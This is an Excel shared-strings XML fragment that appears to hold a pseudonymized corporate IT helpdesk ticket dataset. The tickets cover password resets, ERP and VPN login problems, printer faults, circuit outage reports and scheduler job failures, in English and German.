    <t>rechner fÃ¼r messvorrichtung steli funktioniert nicht \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>barcode scanner defekt \paternoster \bur am orde</t>
  </si>
  <si>
    <t>usb verlÃ¤ngerungskabel liefern .\hxwtidja ixahzmvf</t>
  </si>
  <si>
    <t>hxwtidja ixahzmvf</t>
  </si>
  <si>
    <t>rechner nach update startet nicht \ewew8323649 \cudgevmx waqslrbd</t>
  </si>
  <si>
    <t>cudgevmx waqslrbd</t>
  </si>
  <si>
    <t>iehs metrics input - unable to scroll (urgent please)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fniqhjtg.qrfuetpw@gmail.com_x000D_
_x000D_
good day,_x000D_
_x000D_
please can you advise how i can scroll down this screen â€“ (i have to minimize it in order to view all my entries) not sure what i am doing wrong._x000D_
please help_x000D_
_x000D_
[cid:image002.png@01d209ca.c93911d0][cid:image003.jpg@01d209ca.c93911d0]_x000D_
_x000D_
[cid:image004.jpg@01d209ca.c93911d0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>fniqhjtg qrfuetpw</t>
  </si>
  <si>
    <t xml:space="preserve">kein rechnungseingang beim kunden per e-mail </t>
  </si>
  <si>
    <t xml:space="preserve">kunde 81125605 / cc5202 erhÃ¤lt unsere rechnungen per e-mail - rechnungsempfÃ¤nger 81151242 / cc5202 - empfangende e-mail adresse rechnungseingang@sew-eurodrive.de bis zum 01.08.16 hat der kunde problemlos die rechnungen erhalten. ab dem 02.08.16 nicht mehr. dem kunden liegen die rechnungen somit nicht vor und werden deshalb auch nicht bezahlt. ich kann keine Ã¤nderung feststellen  und bitte deshalb um klÃ¤rung. danke. _x000D_
_x000D_
_x000D_
translation : _x000D_
customer 81125605 / cc5202 receive our inwarehouse_tools by email - inwarehouse_tool recipient 70,040,131 / cc5202 - receiving email address rechnungseingang@sew-eurodrive.de until 01:08:16 the customer easily get the bills. from 02:08:16 not. the customer therefore not be before the bills and are therefore not paid. i can not detect any change and therefore ask for clarification. </t>
  </si>
  <si>
    <t>hgufmidr mfobkyun</t>
  </si>
  <si>
    <t>we've been informed that company malaysia office faced the problem of internet access, please help check and confirm</t>
  </si>
  <si>
    <t xml:space="preserve">do the needful on below e-mail request._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">open tickets - gÃ¼nter steinhÃ¤uÃŸer </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rtnzvplq.erhmuncq@gmail.com_x000D_
_x000D_
need support for one of our team member â€“ gÃ¼ter steinhÃ¤usser, location germany;_x000D_
_x000D_
he already opened already more tickets to get his skype up to speed â€“ but he mentioned that is not solved out after two month;_x000D_
gÃ¼nter has to participate on important hr calls â€“ so he should be able to work with our common communication technology;_x000D_
_x000D_
please support and follow up with gÃ¼nter directly â€“ german language is necessary!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rtnzvplq erhmuncq</t>
  </si>
  <si>
    <t>fixed assets additions list</t>
  </si>
  <si>
    <t>additions are not matching to trial balance and or  to settlement list. difference is mainly cwip of the last year settled in the current year.</t>
  </si>
  <si>
    <t>my powerpoint application crashed everytime after starting a file - impossible to work</t>
  </si>
  <si>
    <t>my powerpoint application crashed everytime after starting a file - impossible to work_x000D_
_x000D_
need to work on a customer proposal and on internal presentations_x000D_
_x000D_
no matheywter what pptx file i open the application crashes immediateley and  i need to restart the computer. _x000D_
_x000D_
_x000D_
it is absolutely impossible to work with powerpoint on my laptop at present_x000D_
_x000D_
i am in transit home from businesstrip - you can reach me as of 14:00 german time</t>
  </si>
  <si>
    <t>jcmxerol nbfyczqr</t>
  </si>
  <si>
    <t>netweaver business client 5.0</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jfsmwpny.klxsdqiw@gmail.com_x000D_
_x000D_
hello colleagues ,_x000D_
_x000D_
need your help._x000D_
today i will start , my "netweaver business client 5.0" for start a "er" but unfortunately the "netweaver business client 5.0" is not working._x000D_
</t>
  </si>
  <si>
    <t>probleme mit laser</t>
  </si>
  <si>
    <t xml:space="preserve">der pc (ganz alter pc) am halbautomaten schaltet sich anscheinend wg. hitze ab._x000D_
lÃ¼fter vom netzteil dreht nicht !_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need help in adding users in au-accounts.receivable@company.com</t>
  </si>
  <si>
    <t>urwqxgdp twepkmis</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number?  5019103263_x000D_
_x000D_
what material or item number? 7352179_x000D_
_x000D_
what warehouse location? from plant_228 to plant_244_x000D_
_x000D_
issue description / error message? no sto possible with these combinations</t>
  </si>
  <si>
    <t>fc fÃ¼r departments\skv-alicona</t>
  </si>
  <si>
    <t xml:space="preserve">hallo marfhtyio.
mit dem freischalten von srgtycha geht klar.
wÃ¼rdest du bitte den hr. bxgwyamr hjbukvcq personalnr. 10056553
und den hr. wjzvabrl bmcfrlyz personalnr. 10560825
ebenfalls freischalten.
danke im voraus.
mfg. reinhard
von: yevirgnl ylhogjct 
gesendet: mittwoch, 7. september 2016 09:04
an: ypladjeu wzfryxav
cc: hqyfebtd pkmyrdga
betreff: wg: zugriffsrechte
hallo reinhard,
ich bitte um ein approval (ok) fÃ¼r den zugriff.
gruss
marfhtyio
mit freundlichen grÃ¼ssen / best </t>
  </si>
  <si>
    <t>issue with the difference amount in the po approval report : zpsr0001 and also kindly remove the programdnty : zpsu0002</t>
  </si>
  <si>
    <t>issue with the difference amount in the po approval report : zpsr0001 and also kindly remove the programdnty : zpsu0002 as this is no longer used.</t>
  </si>
  <si>
    <t>fc auf departments\_scan\we47</t>
  </si>
  <si>
    <t xml:space="preserve">guten morgen,_x000D_
_x000D_
bitte die schreib / leseberechtigung  fÃ¼r ordner m:_scan\we47 einrichten._x000D_
_x000D_
danke_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
freundliche grÃ¼ÃŸe / kind </t>
  </si>
  <si>
    <t>confirmed email address was typed into the userid field. as system was away from the phone called back on mobile: 
pavan confirmed issue was resolved.</t>
  </si>
  <si>
    <t>euyhszrn ktmhjnzp</t>
  </si>
  <si>
    <t>msd crm still no synchronize with erp</t>
  </si>
  <si>
    <t>still no synchronize with erp after repair to zip code see  ticket_no1530289._x000D_
_x000D_
still showing an error see attached file. the zip code is now correct._x000D_
_x000D_
for all user company in israel.</t>
  </si>
  <si>
    <t>question on how to login to impact awards</t>
  </si>
  <si>
    <t xml:space="preserve">to login to impact awards: </t>
  </si>
  <si>
    <t>dwflzqyn uinpgbym</t>
  </si>
  <si>
    <t>account unlock - lichtyuiwu7</t>
  </si>
  <si>
    <t>markhty leibdrty called to have the account unlocked. unlocked, confirmed he was able to login.</t>
  </si>
  <si>
    <t xml:space="preserve">no erp and netweaver enterence_please help aerp. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: chbvyjqr.dqbwijvy@gmail.com_x000D_
_x000D_
colleagues, i can't enter to this programdntys, i need it immediately. please help aerp._x000D_
_x000D_
please see below:_x000D_
_x000D_
[cid:image001.png@01d209b3.957897b0]_x000D_
_x000D_
_x000D_
[cid:image002.png@01d209b3.957897b0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>chbvyjqr dqbwijvy</t>
  </si>
  <si>
    <t>ferbfhyunam is not able to connect with telephony_software interaction desktop</t>
  </si>
  <si>
    <t>error message:  unable to log on for the following reason: 0 bytes read from network stream.
user: ferbfhyunam
workstation: ekmw8111163
see attached picture,</t>
  </si>
  <si>
    <t>xgpqsihu xcswovzi</t>
  </si>
  <si>
    <t>erp net weaver doesnt work, error message: microsoft. net framdntyework 4.5 is not installed.</t>
  </si>
  <si>
    <t>xbgwfmvj oemxazyl</t>
  </si>
  <si>
    <t xml:space="preserve">business_client - log on error - </t>
  </si>
  <si>
    <t xml:space="preserve">business_client logon is not working and throwing error .. seems issue with my laptop and logon is working fine when tried in other system_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>acwoflmg lvwmshcr</t>
  </si>
  <si>
    <t>power outage: south amerirtca: site hard down since at 01:23 am et on 08/09. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________01:23 am et on 08/09______________x000D_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_____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _na______     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _______  global_telecom_1#332645226__________________       _x000D_
_x000D_
12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">skype is not working </t>
  </si>
  <si>
    <t>zrcfyiea gynbmopr</t>
  </si>
  <si>
    <t>we need for all participants an access for the guest  wifi system in-house. (see the attached excel spread sheet) 13.-14</t>
  </si>
  <si>
    <t xml:space="preserve">from: ylqvitsk bfnackrw _x000D_
sent: wednesday, september 07, 2016 4:45 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rakthyesh wg: cost center_x000D_
importance: high_x000D_
_x000D_
hello, _x000D_
_x000D_
we need for all participants an access for the guest  wifi system in-house. (see the attached excel spread sheet)_x000D_
13.-14. sept 2016 _x000D_
_x000D_
time for access: 2 days  _x000D_
location: company fÃ¼rth germany (room-7)_x000D_
event: "technical training metal cutting" _x000D_
_x000D_
the different names you will find in the attached excel-list _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>action required: please connect to the new vpn url before january 30</t>
  </si>
  <si>
    <t xml:space="preserve">from: vivbhuek kanjdye 
sent: thursday, september 08, 2016 9:45 am
to: nwfodmhc exurcwkm
subject: re: action required: please connect to the new vpn url before january 30
hi
we are getting following message
system warnings
  clear system warnings &gt;&gt;
  no javascript is installed
warning: for full functionality, enable javascript in your browser. otherwise, some features, especially those related to web applications in new windows, may not work correctly. 
  cache cleaner is failed
warning: popup blockers can cause the cache cleaner to fail. if you use a popup blocker, you may see outdated pages and forms. for best functionality, disable your popup blocker. 
  policy restriction
access to network access resource company vpn has been denied by the policy engine.
the reason is:
â€¢  no anti-virus or anti-virus is not trusted 
</t>
  </si>
  <si>
    <t>cplant_2404 depreciation  issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bujiesrg.zopcrshl@gmail.com
dear ,
i find a gap between fs10n report and asset balance report (s_alr_98122075) in 5319
for cplant_2404 cost center , we only add two rrc asset in jul, so the depreciation should be 16,922.2 rmb( 8,461.01+8,461.01=16,922.2) increase in aug.
but when i run fs10n find the depreciation only add 7,012.55rmb (60,195.23-53,182.68=7,012.55)
can you give me some idea about this?</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
mr. hatryupsfshytd user id locked. please reset the password and send the new password to his manager mr. panghyiraj shthuihog &lt;ebkfwhgt.flapokym@gmail.com&gt;
emp no
name
useid
manager
200746709
aqihfoly xsrkthvf
hsh
panghyiraj shthuihog
fyi.
[cid:image001.png@01d209b2.81cadcb0]
with </t>
  </si>
  <si>
    <t>è½¬å‘: è®¢å•å·ï¼š5212346451å¯ä»¥ç­¾å­—äº†</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: apacjun.zhang@company.com_x000D_
_x000D_
hello alex_x000D_
è¿™ä¸ªå¯ä»¥å¼€ç¥¨äº†ï¼Œå¤šè°¢ï¼_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>qzbxfncr kysuqema</t>
  </si>
  <si>
    <t>can not login in erp SID_1 for uacyltoe hxgayczeing</t>
  </si>
  <si>
    <t>attached the screen shot for the error information.</t>
  </si>
  <si>
    <t>circuit  outage: primary circuit company-eu-deu-koenigsee-mpls-2911-rtr01.company.com is down since 6:35 pm et</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______ 6:35 pm et on 9/7________________x000D_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</si>
  <si>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node down - on   lhqsm68267 </t>
  </si>
  <si>
    <t xml:space="preserve">erp access </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: idkfgcnq.vjwhmzor@gmail.com
good afternoon,
can you please unlock my username for erp. i have been locked for too many log in attempts.
vyjmlain hvjbmdgi
senior technical service rep
inside-sales@company.com&lt;mailto:inside-sales@company.com&gt;
</t>
  </si>
  <si>
    <t>it request</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: otmpauyr.ijztksal@gmail.com_x000D_
_x000D_
hello._x000D_
my supervisor (ybuvlkjq nwcobvpl) has asked me to send an it request.  i am able access documents in some folders on our h drive, but not all.  i would like permission to access documents that are located in the quality control folder located at h:\quality control._x000D_
</t>
  </si>
  <si>
    <t>otmpauyr ijztksal</t>
  </si>
  <si>
    <t>telephony_software phone issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tjlgzkbp.iervwjzg@gmail.com_x000D_
_x000D_
hello it,_x000D_
_x000D_
yesterday i had the telephony_software phone and system update done._x000D_
today, i notice that it shows a 'yellow' phone icon showing that i am on the phone but i am not._x000D_
i am not receiving calls._x000D_
can you please assist quickly._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063d failed in job_scheduler at: 09/07/2016 16:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063d failed in job_scheduler at: 09/07/2016 16:16:00</t>
  </si>
  <si>
    <t>uninstall google chrome</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38filesys failed in job_scheduler at: 09/07/2016 15:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38filesys failed in job_scheduler at: 09/07/2016 15:36:00</t>
  </si>
  <si>
    <t>70124272 customer erp #  no longer available in crm to create new opportstorage_product</t>
  </si>
  <si>
    <t xml:space="preserve">i have 4 closed won opportunities for this customer and 3 active open opportunities for this customer.  tried to create another opportstorage_product for this customer and they are no longer on my list of available customers.  when i try to put their name in the account/end user name field i get the statement "no records found"  tried several other customers and they work, just not this one._x000D_
</t>
  </si>
  <si>
    <t>blank call gso // loud noise</t>
  </si>
  <si>
    <t>unable to connect to network drives on vpn</t>
  </si>
  <si>
    <t>account locked on vpn page</t>
  </si>
  <si>
    <t>company email password not working</t>
  </si>
  <si>
    <t>vip 2 // SID_60 hana login</t>
  </si>
  <si>
    <t>name:stdezpqw bkmeuhfz
language:
browser:microsoft internet explorer
email:stdezpqw.bkmeuhfz@gmail.com
customer number:
telephone:=
summary:need access to erp hana SID_60</t>
  </si>
  <si>
    <t>reset the password for iwtvrhnz rxiumhfk on erp / production / erp</t>
  </si>
  <si>
    <t>ticket update on inplant_857988</t>
  </si>
  <si>
    <t>pqizlhkx adbyhglu</t>
  </si>
  <si>
    <t>please send expense report 2111137753 to qmglkaru qiwhfkdv for approval</t>
  </si>
  <si>
    <t xml:space="preserve">please manually send expense report 2111137753 to qmglkaru qiwhfkdv for approval, its stuck w/ pathuick thgheijmer due to reporting relationship changes. </t>
  </si>
  <si>
    <t>siqobhlz vwljuize</t>
  </si>
  <si>
    <t>connection issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: riqmdnzs.mtlghwex@gmail.com_x000D_
_x000D_
dear team,_x000D_
_x000D_
please help to raise a ticket with network team as the user slkxgzdj wxpytevu working remotely in erp systems and he keep getting kicked out without able to continue his work_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HostName_1201 plm server</t>
  </si>
  <si>
    <t>just to let someone now that the dsccache service isn't running on HostName_1201</t>
  </si>
  <si>
    <t>unable to connect to dv28, dv06, and dv40</t>
  </si>
  <si>
    <t>unknown emails from miltgntyuon knighdjhtyt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zxobmreq.udikorhv@gmail.com_x000D_
_x000D_
i was going to forward 2 emails i received, but it gives me an alert message â€“ see attachments.  if you need to connect with my terminal let me know.  i moved them both to my delete box._x000D_
</t>
  </si>
  <si>
    <t>account locked out, need to unlock</t>
  </si>
  <si>
    <t>circuit outage : apac - china vpn circuit is down at 12:41 pm et on 09/07. site is up on mpls.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________12:41 pm et on 09/07______________x000D_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______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____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</si>
  <si>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install analysis office 2.2 sp 03 in clrgtydia's pc since office version is 2016</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,_x000D_
_x000D_
please install analysis office 2.2 sp 03 in clrgtydia's pc since office version is 2016 and set up hana SID_60/ SID_59 connections._x000D_
_x000D_
at present, xawlkiey demjqrfl's pc has ao 1.4 which is not compatible with office 2016._x000D_
_x000D_
issue is sev 2._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>skype for business extend access to external partners</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sbgvrncj.idfhtoqv@gmail.com_x000D_
_x000D_
hello,_x000D_
please extend the skype for business access of przcxbml vnjdghui (a contractor) so that she is able to arrange conference calls with external company parties. she is working on a critical company payroll project for germany that involves significant external vendor contact so her skype permissions should be set the same as mine._x000D_
many </t>
  </si>
  <si>
    <t>unable to change password on password_management_tool password manager</t>
  </si>
  <si>
    <t>khaibsvt lkvfxzpj</t>
  </si>
  <si>
    <t>konto resetten</t>
  </si>
  <si>
    <t>erp &amp; business_client password reset request</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: svbymfiz.afqvyuwh@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
please help to reset my password for erp SID_34 &amp; business_client_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>svbymfiz afqvyuwh</t>
  </si>
  <si>
    <t>jsmhzqpo bpexofya</t>
  </si>
  <si>
    <t>gadbpfrz unvdyask</t>
  </si>
  <si>
    <t>password reset to hub</t>
  </si>
  <si>
    <t>wducnbfp wxiqjuce</t>
  </si>
  <si>
    <t xml:space="preserve">erp problem </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bajrpckl.cevtiuob@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
   i am not able to see more than the below list in va35._x000D_
_x000D_
[cid:image001.jpg@01d20941.19746b70]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bajrpckl cevtiuob</t>
  </si>
  <si>
    <t>what's the meaning of this "warning message"</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zywoxerf.paqxtrfk@gmail.com
dear help desk:
i'd like to know what's the meaning of the following "warning message" when i click on engineering tool and after login.
[cid:image001.jpg@01d208e8.d36cbf40]
x.  jdamieul  fandyhgg
phd, us patent agent
senior staff engineer
zywoxerf.paqxtrfk@gmail.com
</t>
  </si>
  <si>
    <t>name:mfeyouli ndobtzpw
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:please reset erp. SID_34 for boivin</t>
  </si>
  <si>
    <t>constantly receiving "usb device not recognized" and i have to install my default printer driver after every reboot</t>
  </si>
  <si>
    <t>constantly receiving "usb device not recognized" and i have to install my default printer driver after every reboot  (cl92)</t>
  </si>
  <si>
    <t>rcivkdxo hlyrieck</t>
  </si>
  <si>
    <t>unable to log on to distributor_tool.</t>
  </si>
  <si>
    <t>zlnxswvp ptmzsbhk</t>
  </si>
  <si>
    <t>supply_chain_software</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cjsukemx.lqkcesuf@gmail.com_x000D_
_x000D_
please reset my supply_chain_software password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vpn query</t>
  </si>
  <si>
    <t>vpn query. user wanted to know if he can connect to vpn.</t>
  </si>
  <si>
    <t xml:space="preserve">cannot log into erp SID_34 erp production with new password - need access </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yisohglr.uvteflgb@gmail.com
hi -
i recently changed my password and i tried to log into erp but i keep receiving a message that login is no longer possible and there are too many failed attempts (i only tried to log in one time).   when i changed my password, i also received an error message that the password change failed - see attached.the new password works for all the other applications on my computer except for erp.   i use erp on a daily basis and need to access SID_34 erp production.
my user id is rubyfgty so please let me know if you can help with this issue.
</t>
  </si>
  <si>
    <t>iotudrxg odpcwvez</t>
  </si>
  <si>
    <t>unable to launch ethics.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to launch ethics. login credentials invalid error.
1. primary smtp address: from outlook address book - karghyuen.hasghyusan@company.com
2. new to company/ returned after resignation/account changed from temp to permanent? no
3. taken ethics before? received email from .ethics to take the ethics course? any organizational change? yes. my email address                              used to be htsnaodb.adjtmlzn@gmail.com  starting in fy17, i was moved to company.
4. any name change / email address change? email address change. my email address used to be htsnaodb.adjtmlzn@gmail.com  starting in fy17, i was moved to company.
5. any medial leave/leave of absence recently? no
</t>
  </si>
  <si>
    <t xml:space="preserve">  also, the account needs to be given to davgtgyrh smgnhyleck.</t>
  </si>
  <si>
    <t xml:space="preserve">bhghtyum,
                i will need additional time, please do not delete this account on september 9th.  also, the account needs to be given to davgtgyrh smgnhyleck.
</t>
  </si>
  <si>
    <t>ujtmipzv cwdzunxs</t>
  </si>
  <si>
    <t>password locked out on erp SID_34</t>
  </si>
  <si>
    <t>gljkfidc kelctrpf</t>
  </si>
  <si>
    <t>outlook not updating emails</t>
  </si>
  <si>
    <t>ticket update for inplant_858062</t>
  </si>
  <si>
    <t>freigabe auf ordner fÃ¼r ytcxjzue guplftok (krafghyumec1) und zbijdqpg ehpjkwio (dinktyhed)</t>
  </si>
  <si>
    <t xml:space="preserve">unter departments (\\HostName_579) (m:) unter info/freigabe ordner beschichtung mit allen unterordnern </t>
  </si>
  <si>
    <t>change screensaver company to company</t>
  </si>
  <si>
    <t xml:space="preserve">please change my screensaver to company._x000D_
pc name: ekql700085_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>network problems (multiple applications are running slow) EU_tool and downloads lists to vmsliazh ltksxmyv</t>
  </si>
  <si>
    <t xml:space="preserve">how did you determine there are network problems ? if i want ot download lists to vmsliazh ltksxmyv interrogates (questioning) time out is coming. the same with EU_tool. if we want to print labels the same error is coming_x000D_
_x000D_
are more than one transactions impacted? _x000D_
_x000D_
what server are you on?  vmsliazh ltksxmyv_x000D_
do other co-workers also notice slow response times in erp ? yes, we have problems too in our shipment department_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>printer cl98</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
good morning
i have made several attempts to print to printer cl98.  i have also powered the device down then back up. and retried printing.  no print but the printer drivers are refreshed.
had a colleague try and she had the same results
i deleted the printer cl98 from my pc and reinstalled it.  it reinstalled as prtgn0022.  when i printed to it the print came out successfully.
how can a printer be changed from cl98 to gn22 without notification?  should this printer be known as gn22 or is this a error that requires further investigation?
mikhghytr wafglhdrhjop
</t>
  </si>
  <si>
    <t>erp-step interface programdnty not sending all ebom data to step</t>
  </si>
  <si>
    <t xml:space="preserve">erp-step interface programdnty is not generating idoc data for all ebom items. 5 examples below._x000D_
mm#s 3313551 and 3313561 is not sending step all the ebom data.  we are missing the ebom insert screw. also we have the same issue with missing ebom items (screws) for mm# 6235933, 6235934, 6235935._x000D_
_x000D_
.  erp data_x000D_
below is a list of the bom items for the materials in question.  i do know that both ms2006 and ms2005 are material type raw material.  i thought that you were able to show the data in the bom regardless of the material type, but that could be the issue.  the ebom is showing what is on the drawings, and the ebom is created, so i'm not certain why the materials force didn't work.  joe uses the same programdnty that i do to force product._x000D_
_x000D_
material number      ansi code            position             component material   ansi of component   _x000D_
6235933 krcscfpr061y                   0010                 2010829 ms2006                        _x000D_
6235933 krcscfpr061y                   0020                 2010831 ms2005                        _x000D_
6235933 krcscfpr061y                   0030                 2132602 ft7                           _x000D_
6235933 krcscfpr061y                   0040                 2132604 ft8                           _x000D_
6235934 krcscfpr062y                   0010                 2010829 ms2006                        _x000D_
6235934 krcscfpr062y                   0020                 2010831 ms2005                        _x000D_
6235934 krcscfpr062y                   0030                 2132602 ft7                           _x000D_
6235934 krcscfpr062y                   0040                 2132604 ft8                           _x000D_
6235935 krcscfpr063y                   0010                 2010829 ms2006                        _x000D_
6235935 krcscfpr063y                   0020                 2010831 ms2005                        _x000D_
6235935 krcscfpr063y                   0030                 2132602 ft7                           _x000D_
6235935 krcscfpr063y                   0040                 2132604 ft8                           _x000D_
_x000D_
step data_x000D_
                                                    bom_0020            bom_0030                            bom_0040_x000D_
3313551 krbb10scfpr06085c 2132602:ft7:torx wrench_engineering_tool  _x000D_
3313561 krbb10scfpr06110c 2132602:ft7:torx wrench_engineering_tool  _x000D_
6235933 krcscfpr061y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000D_
6235934 krcscfpr062y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000D_
6235935 krcscfpr063y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need to configure printers tc47 and tc19</t>
  </si>
  <si>
    <t>akzyhdlg pguazhbs</t>
  </si>
  <si>
    <t>reset passwords for mafgtnik -0 using password_management_tool password reset.</t>
  </si>
  <si>
    <t>plzsntqj ujdyobsk</t>
  </si>
  <si>
    <t>unable to extend the display on external monitor</t>
  </si>
  <si>
    <t>circuit outage :germany,germany-divestiture site vpn rtr 02 is down at 08:04 am et 09/07,site is up on vpn rtr 01.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________at 08:04 am et 09/07______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ---------------no------------(yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes______ (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ______yes__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    __na_________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</si>
  <si>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reset passwords for cÃ©sar abreu rghkiriuytes using password_management_tool password reset.</t>
  </si>
  <si>
    <t>unable to launch netweaver</t>
  </si>
  <si>
    <t>unable to print from adobe</t>
  </si>
  <si>
    <t>skype meeting code/pin</t>
  </si>
  <si>
    <t>need ability to create skype meetings through outlook.</t>
  </si>
  <si>
    <t>ovpuqfaj pqruovit</t>
  </si>
  <si>
    <t>hr_tool etime will not run after update ran last night, it asks for adobe flash which i tried to install several times</t>
  </si>
  <si>
    <t>immediate need</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/07/2016 07:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/07/2016 07:52:00</t>
  </si>
  <si>
    <t>mdrguhox qczwadyx</t>
  </si>
  <si>
    <t>problleme mit EU_tool \we212571 \bejvhsfx dmvsclhp</t>
  </si>
  <si>
    <t>bejvhsfx dmvsclhp</t>
  </si>
  <si>
    <t>battery charging issue</t>
  </si>
  <si>
    <t>need vpn access</t>
  </si>
  <si>
    <t>need vpn access. new employee has a company laptop. emzlw800043</t>
  </si>
  <si>
    <t>vrdjzswx rlweqdhs</t>
  </si>
  <si>
    <t>reset passwords for reghythicsa purvis using password_management_tool password reset.</t>
  </si>
  <si>
    <t>i just need to reset my password for the interaction desktop / telephony_software.  user name is pughjuvirl</t>
  </si>
  <si>
    <t>unlock account lichtyuiwu7</t>
  </si>
  <si>
    <t>production order 'grade' is partially printed in hebrew.</t>
  </si>
  <si>
    <t>EMEA: production order 'grade' is partially printed in hebrew. please see example attached. in en it is printed fully.</t>
  </si>
  <si>
    <t>java issue</t>
  </si>
  <si>
    <t>unable to continue the java update</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</si>
  <si>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kd05 (ex hq50 â€“ wy98 - hp 8150) _x000D_
 _x000D_
   â€¢  detailed description of the problem ?can not install driver to use this printer._x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) any_x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem? outlook, word     (ex windows / erp /kls)_x000D_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</si>
  <si>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zgdvhfop kbrmfcog</t>
  </si>
  <si>
    <t>security incidents - ( #in33578632) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17</t>
  </si>
  <si>
    <t>source ip: 29.26.13.3095_x000D_
source hostname: HostName_17_x000D_
destination hostname: lmxl9516623_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:_x000D_
-------------------------------------------------------------------------------------------------------------------------------------------_x000D_
